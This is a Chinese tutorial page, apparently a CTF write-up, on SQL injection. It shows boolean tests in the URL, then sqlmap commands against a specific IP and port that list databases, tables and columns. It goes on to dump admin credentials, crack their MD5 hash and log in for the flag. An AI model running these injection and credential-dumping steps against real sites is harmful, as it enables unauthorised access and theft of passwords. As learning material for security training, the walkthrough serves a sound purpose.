主页 > 知识库 > sqlmap注入图文详解

sqlmap注入图文详解

热门标签:服务外包 百度竞价排名 呼叫中心市场需求 Linux服务器 铁路电话系统 地方门户网站 AI电销 网站排名优化

1.发现此网址可能存在sql注入漏洞,我们进行sql盲注入测试一下是否存在漏洞。

地址栏输入 and 1=1 发现页面正常显示。


再次输入and 1=2 页面出现错误,说明该页面可能存在sql注入漏洞


2.现在拿出我们的kali工具,sqlmap进行注入测试。

sqlmap -u http://219.153.49.228:49634/new_list.php?id=1 --dbs


3.可以看到存在注入漏洞,扫到了5个数据库。要获取管理员用户密码,我们可以先从stormgroup注入。查看stormgroup这个数据库存在的表单

sqlmap -u http://219.153.49.228:49634/new_list.php?id=1 -D stormgroup -tables


4.接下来查一下member中存在哪些列。

sqlmap -u http://219.153.49.228:49634/new_list.php?id=1 -D stormgroup -T member --columns


5.上一步可以看到,name,password 是不是很熟悉。ok接下来我们开始获取这两列的数据。


6.可以看到password是经过md5加密,接下来我们把他解密。这里推荐给大家我自己收集的多种解密网址:解密网址大全点击这里


7.now! 密码已经呈现在我们眼前!!!!找到后台地址进行登录。


8.END 登录成功,拿到flag,提交。Gameover !

总结

本篇文章就到这里了,希望能给你带来帮助,也希望您能够多多关注脚本之家的更多内容!

您可能感兴趣的文章:
  • MyBatis 中 SqlMapConfig 配置文件详解
  • Windows下Sqlmap环境安装教程详解
  • MyBatis直接执行SQL的工具SqlMapper
  • Mybatis中SqlMapper配置的扩展与应用详细介绍(1)
  • 使用XSD校验Mybatis的SqlMapper配置文件的方法(2)

标签:兰州 崇左 仙桃 湖南 衡水 湘潭 黄山 铜川

巨人网络通讯声明:本文标题《sqlmap注入图文详解》,本文关键词  ;如发现本文内容存在版权问题,烦请提供相关信息告之我们,我们将及时沟通与处理。本站内容系统采集于网络,涉及言论、版权与本站无关。
  • 相关文章
  • 收缩
    • 微信客服
    • 微信二维码
    • 电话咨询

    • 400-1100-266